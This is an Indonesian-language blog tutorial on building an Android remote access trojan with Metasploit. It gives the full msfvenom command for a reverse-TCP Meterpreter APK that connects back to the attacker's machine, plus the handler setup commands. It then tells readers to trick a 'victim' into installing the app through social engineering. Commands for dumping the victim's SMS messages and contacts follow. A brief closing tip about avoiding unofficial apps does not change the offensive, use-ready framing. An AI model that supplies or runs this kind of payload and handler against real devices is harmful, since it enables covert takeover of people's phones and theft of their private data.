Tutorial RAT / Remote Android Dengan Metasploit
Apa sih itu RAT? Remote Access Trojan adalah sebuah software yang dibuat untuk mengontrol atau me remote device secara jarak jauh maupun satu jaringan. file backdoor yang dibuat oleh software tersebut disebut "payload" bentuknya bermacam macam tergantung device yang digunakan misalnya apk untuk android, exe untuk windows, deb untuk os berbasis debian, php untuk web server dan lain sebagainya tergantung target yang akan di rat.
untuk melakukan rat kalian bisa menggunakan 2 tipe yaitu satu jaringan dan beda jaringan, jika device target berada pada satu jaringan (LAN,WIFI,HOSTPOT) kalian bisa menggunakan local ip. jika device jarak jauh kalian bisa menggunakan ngrok kali ini saya hanya membahas hanya untuk jika kita satu jaringan.
Di pembahasan kali ini saya bakal ngasih tutorial tentang cara me remote android dengan menggunakan metasploit, sebenarnya software untuk melakukan rat itu banyak seperti Ahmyth, A-RAT dan lain sebagainya bisa anda cari di google.
Cara menggunakan metasploit untuk melakukan RAT pada android
Pertama-tama kalian install terlebih dahulu metasploit di device anda, kalian bisa cari cara penginstallan metasploit framework di google.
setelah selesai menginstall metasploit, lalu buka terminal dan ketikkan :
ifconfig
setelah itu copy ip address milik kalian yang ada pada bagian interface jaringan kalian.
lalu ketikkan command :
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.135 LPORT=1337 R> payload.apk> -p adalah untuk jenis tipe payload yang digunakan.
> android/meterpreter/reverse_tcp meterpreter / tipe payload yang kita gunakan.
> LHOST (Listen Host) adalah alamat ip yang digunakan untuk terhubung kembali dengan payload
> LPORT (Listen Port) adalah port yang digunakan untuk payload
> R> payload.apk ouput / result dari payload tersebut
Note : Kalian harus mengganti LHOST dengan ip lokal milik kalian seperti cara diatas, ip akan berbeda-beda setiap device, untuk lport kalian bebas ingin berapa saja, untuk result apk kalian bisa ganti namanya dari payload.apk ke nama lain seperti reypacarnino.apk sesuka kalian.
setelah itu tunggu beberapa saat hingga payload berhasil dibuat.
payload.apk adalah file yang akan kita gunakan untuk mengontrol android korban.
jika sudah, ketikkan command ini di terminal :
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.135
set lport 1337
exploit
untuk lhost dan lport sesuaikan seperti yang digunakan pada payload
setelah itu kalian harus membuat korban menginstall aplikasi tersebut dan membukanya, kalian bisa memakai social engineering atau rekayasa sosial untuk memanipulasi korban.
setelah korban menginstall dan membuka aplikasi tersebut maka otomatis kita sudah mendapat remote / control dari hp tersebut.
kalian bisa ketikkan beberapa command seperti sysinfo untuk mengambil informasi tentang device, untuk command lengkapnya kalian bisa ketikkan ? atau help.
banyak command yang mempunyai fungsi masing-masing, seperti :
dump_sms untuk merekam semua sms yang masuk / ada dan akan tersimpan di file txt.
dump_contact untuk mendump semua contact yang ada di hp korban.
check_root untuk mengecek apakah hp korban sudah di root/belum.
dan masih banyak command yang lain, kalian bisa mempratekkan sendiri / mencari tahu di google.
Penutupan
Mungkin segini aja materi yang bisa saya sampaikan, saran saya jangan suka menginstall aplikasi yang belum resmi atau yang di download langsung dari website yang tidak resmi karena bisa berpotensi aplikasi tersebut tidak aman/dimasukkan sebuah malicious code. sekian dari saya jika ada kata-kata yang kurang tepat atau ada penambahan bisa kalian comment dibawah.
Keep calm and Exploit!
Post a Comment